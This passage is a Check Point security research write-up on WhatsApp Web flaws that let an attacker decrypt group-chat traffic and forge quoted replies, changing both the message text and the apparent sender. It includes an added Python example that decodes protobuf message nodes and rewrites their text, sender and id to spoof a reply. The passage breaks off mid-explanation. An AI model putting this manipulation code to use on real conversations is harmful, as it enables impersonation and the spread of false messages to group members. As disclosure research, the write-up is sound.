Research By: Dikla Barda, Roman Zaikin and Oded Vanunu
As of early 2018, the Facebook-owned messaging application, WhatsApp, has over 1.5 billion users with over one billion groups and 65 billion messages sent every day. With so much chatter, the potential for online scams, rumours and fake news is huge. It doesn’t help then, if threat actors have an additional weapon in their arsenal to leverage the platform for their malicious intentions.
Check Point Research recently unveiled new vulnerabilities in this popular messaging application that could allow threat actors to intercept and manipulate messages sent in both private and group conversations, giving attackers immense power to create and spread misinformation from what appear to be trusted sources.
Our team observed three possible methods of attack exploiting this vulnerability, all of which involve social engineering tactics to fool end users. A threat actor can:
1. Use the ‘quote’ feature in a group conversation to change the identity of the sender, even if that person is not a member of the group.
2. Alter the text of someone else’s reply, essentially putting words in their mouth.
3. Send a private message to another group participant that is disguised as a public message for all, so that when the targeted individual responds, the reply is visible to everyone in the conversation.
Following the process of responsible disclosure, Check Point Research informed WhatsApp of these findings. We believe these vulnerabilities to be of the utmost importance and to require attention.
Please read below for our full technical analysis.
Demonstration Video of the Attacks in Action
Technical Analysis
As is well known, WhatsApp encrypts every message, picture, call, video or any other type of content you send so that only the recipient can see it. What’s more, not even WhatsApp has the ability to view those messages.
Figure 1: WhatsApp Encrypted Chat
These encryption processes caught our attention, and we decided to try to reverse WhatsApp’s algorithm so that we could decrypt the data. Once we had decrypted the WhatsApp communication, we found that the messages carried inside it are serialised with the protobuf2 format.
By converting this protobuf2 data to JSON we were able to see the actual parameters that are sent, and to manipulate them in order to test WhatsApp’s security.
The outcome of our research is a Burp Suite extension and three manipulation methods.
Before any manipulation can start, though, we first have to obtain the public and private key of our session and enter them into our Burp Suite extension.
If you are interested in a detailed explanation about how the encryption actually works behind the scenes, please read the encryption paragraph at the end of this blog post.
Accessing the Keys
The keys can be obtained from the key generation phase of WhatsApp Web, before the QR code is generated:
Figure 2: Public and Private Key of the Communication
After we have these keys, we also need to take the “secret” parameter, which is sent by the mobile phone to WhatsApp Web while the user scans the QR code:
Figure 3: The Secret Key from the WebSocket
As a result of this, our extension will look like the below:
Figure 4: WhatsApp Decoder Burp Extension
After clicking on “Connect”, the extension connects to its own local server, which performs all the work (decryption and re-encryption of the captured traffic) on the extension’s behalf.
Manipulating WhatsApp
By decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to manipulate them and start looking for security issues.
This resulted in us being able to carry out a variety of attack types, which are described below.
Attack 1: Change the Identity of a Sender in a Group Chat, Even If They Are Not a Member of the Group
In this attack, it is possible to spoof a reply message to impersonate another group member and even a non-existing group member, for example, ‘Mickey Mouse’.
To impersonate someone from the group, all the attacker needs to do is capture the encrypted traffic:
Figure 5: Encrypted WhatsApp Communication
Once the traffic is captured, it can simply be passed to the extension, which then decrypts it:
Figure 6: Decrypting the WhatsApp Message by Using Our Extension
The interesting parameters to note here are:
conversation: the actual content which is sent.
participant: the participant that actually sent the content.
fromMe: indicates whether I sent the data or someone else in the group did.
remoteJid: indicates to which group/contact the data is sent.
id: the id of the data. The same id will appear in the phone databases.
And this is the point where interesting things begin to happen…
For example, we can change the conversation to something else. A message with the content “Great!” sent by a member of a group, for instance, could be changed to “I’m going to die, in a hospital right now”, and the participant parameter could also be changed to someone else from the group:
Figure 7: A Spoofed Reply Message
Note that we also have to change the id to a new value, because the original id has already been sent and is already stored in the phone database.
To make everyone in the group see the new spoofed message, the attacker then replies to the message he spoofed, quoting it; the quoted, altered message (“Great!” replaced by the new text) is thereby delivered to everyone in the group.
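The following is an added, self-contained example (written for this write-up; it is not Check Point’s Burp extension or any WhatsApp code) that ties together the protobuf2-to-JSON decoding mentioned earlier and the spoofed-reply manipulation just described: it parses a message node from raw protobuf2 wire format into a dict, shows it as JSON, rewrites conversation and participant, assigns a fresh id, and re-encodes. The parameter names are the ones from the article; the field numbers, the nested message layout, the sample JIDs and the sample id are assumptions and constructed values, not something the article states.

```python
"""Decode, edit and re-encode a WhatsApp Web message node in protobuf2 wire format.

Constructed example for this write-up, not Check Point's extension. Field NAMES come
from the article; field NUMBERS and the nesting are an assumption (they follow the
community-reverse-engineered WhatsApp Web schema, which the article does not state).
"""
import json
import secrets

# Assumed schema: message type -> {field number: (field name, kind)}
SCHEMA = {
    "WebMessageInfo": {1: ("key", "MessageKey"), 2: ("message", "Message")},
    "MessageKey": {1: ("remoteJid", "string"), 2: ("fromMe", "bool"),
                   3: ("id", "string"), 4: ("participant", "string")},
    "Message": {1: ("conversation", "string")},
}


def _read_varint(buf, pos):
    """Read a base-128 varint at pos; return (value, position after it)."""
    value, shift = 0, 0
    while True:
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def _write_varint(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        if n == 0:
            out.append(b)
            return bytes(out)
        out.append(b | 0x80)


def decode(buf, msg_type):
    """Parse protobuf bytes into a dict; unknown fields are kept so they survive re-encoding."""
    fields, out, pos = SCHEMA[msg_type], {}, 0
    while pos < len(buf):
        tag, pos = _read_varint(buf, pos)
        field_no, wire_type = tag >> 3, tag & 7
        if wire_type == 0:                      # varint
            val, pos = _read_varint(buf, pos)
        elif wire_type == 2:                    # length-delimited (string / sub-message)
            length, pos = _read_varint(buf, pos)
            val, pos = buf[pos:pos + length], pos + length
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        name, kind = fields.get(field_no, (f"field_{field_no}", "raw"))
        if kind == "string":
            val = val.decode("utf-8")
        elif kind == "bool":
            val = bool(val)
        elif kind in SCHEMA:
            val = decode(val, kind)
        elif wire_type == 0:
            val = {"wire_type": 0, "value": val}
        else:
            val = {"wire_type": 2, "hex": val.hex()}
        out[name] = val
    return out


def encode(obj, msg_type):
    """Inverse of decode(): serialise the dict back to protobuf bytes, in dict order."""
    by_name = {name: (no, kind) for no, (name, kind) in SCHEMA[msg_type].items()}
    out = bytearray()
    for name, val in obj.items():
        if name in by_name:
            no, kind = by_name[name]
            if kind == "bool":
                out += _write_varint(no << 3) + _write_varint(int(val))
                continue
            payload = val.encode("utf-8") if kind == "string" else encode(val, kind)
        else:                                   # unknown field, written back verbatim
            no = int(name.split("_")[1])
            if val["wire_type"] == 0:
                out += _write_varint(no << 3) + _write_varint(val["value"])
                continue
            payload = bytes.fromhex(val["hex"])
        out += _write_varint(no << 3 | 2) + _write_varint(len(payload)) + payload
    return bytes(out)


def to_json(raw):
    """The decrypted node as readable JSON, which is what makes the parameters visible."""
    return json.dumps(decode(raw, "WebMessageInfo"), indent=2)


def spoof_reply(raw, new_text, new_participant, new_id=None):
    """Attack 1: change the text and the apparent sender and give the node a fresh id
    (the original id is already stored in the phone database, so it must not be reused)."""
    msg = decode(raw, "WebMessageInfo")
    msg["message"]["conversation"] = new_text
    msg["key"]["participant"] = new_participant   # need not be a member of the group
    msg["key"]["id"] = new_id or secrets.token_hex(10).upper()
    return encode(msg, "WebMessageInfo"), msg


# Constructed sample node: a group member replied "Great!" (all values are made up).
ORIGINAL = encode({
    "key": {"remoteJid": "123456789-1530000000@g.us", "fromMe": False,
            "id": "3EB0A1B2C3D4E5F6A7B8", "participant": "15551234567@s.whatsapp.net"},
    "message": {"conversation": "Great!"},
}, "WebMessageInfo")
```

Running `print(to_json(ORIGINAL))` shows the five parameters discussed above; `spoof_reply(ORIGINAL, "I’m going to die, in a hospital right now", "Mickey Mouse")` returns the re-encoded bytes that would be handed back to the encrypting side, with a participant value that is plain text rather than a real group member. Fields the schema does not know about are round-tripped unchanged, which matters in practice because a real node carries many more fields than the five named here.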
As you can see in the screenshot below, we created a new group in which no previous messages had been sent, and by using the method above we were able to create a fake reply.
Figure 8: The Original Conversation
The ‘participant’ parameter can also be free text or the phone number of someone who is not in the group, which causes everyone in the group to believe the message was actually sent by that participant.
For example:
Figure 9: Changing The Content Of The Message By Using Our Debugging Tool
…and the result will look like this: